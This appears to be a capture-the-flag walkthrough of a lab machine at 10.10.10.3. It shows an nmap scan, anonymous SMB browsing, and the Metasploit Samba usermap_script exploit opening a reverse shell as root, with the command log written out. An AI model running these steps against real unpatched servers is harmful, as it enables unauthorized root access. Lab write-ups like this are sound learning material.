This was such an easy machine, its almost not worth completing the write-up for it. But i decided in the end that i would, purely for completeness.
I scanned the machine with NMAP, and was presented with the following details.
# Nmap 7.70 scan initiated Thu Aug 22 10:10:07 2019 as: nmap -A -p- -oN scan 10.10.10.3 Nmap scan report for 10.10.10.3 Host is up (0.065s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.3 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -2d23h03m38s, deviation: 0s, median: -2d23h03m38s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2019-08-19T02:31:04-04:00 |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 30.07 ms 10.10.14.1 2 31.77 ms 10.10.10.3 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Aug 22 10:35:22 2019 -- 1 IP address (1 host up) scanned in 1516.09 seconds
From here we can see FTP, SMB, DISTCC and SSH are all running. Anonymous access was allowed on FTP. But there are no files present. I next tried connecting to SMB:
root@kali://root/websvr# smbclient \\\\10.10.10.3\\tmp -p 445 Enter WORKGROUP\root's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Dec 6 16:56:00 2019 .. DR 0 Sun May 20 20:36:12 2012 orbit-makis DR 0 Fri Dec 6 11:25:31 2019 .ICE-unix DH 0 Fri Dec 6 11:03:09 2019 .X11-unix DH 0 Fri Dec 6 11:03:34 2019 gconfd-makis DR 0 Fri Dec 6 11:25:31 2019 .X0-lock HR 11 Fri Dec 6 11:03:34 2019 5120.jsvc_up R 0 Fri Dec 6 11:04:17 2019 7282168 blocks of size 1024. 5678284 blocks available
You see see from the output we also have anonymous SMB access. However after some browsing around there are no useful files stored within SMB either.
One of the details detected in the NMAP scan was that Samba 3.0.20-Debian was being used. I did a google search for exploits involving this version of SAMBA. I found a Username Map Script exploit which allows command execution by specifying a username containing shell meta characters. This exploit in included in metasploit. So i started msfconsole and ran the exploit:
msf5 > use exploit/multi/samba/usermap_script msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3 RHOST => 10.10.10.3 msf5 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP double handler on 10.10.14.25:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo RXu673TIo0yJNYIz; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "RXu673TIo0yJNYIz\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:59078) at 2019-12-09 20:05:13 +0000 ls bin boot cdrom dev etc home initrd initrd.img lib lost+found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz whoami root cd root ls Desktop reset_logs.sh root.txt vnc.log cat root.txt [REDACTED]
From the output you can see the exploit ran successfully. Entering the whoami command showed that i was running as root. From here i was able to browse to /root and cat root.txt.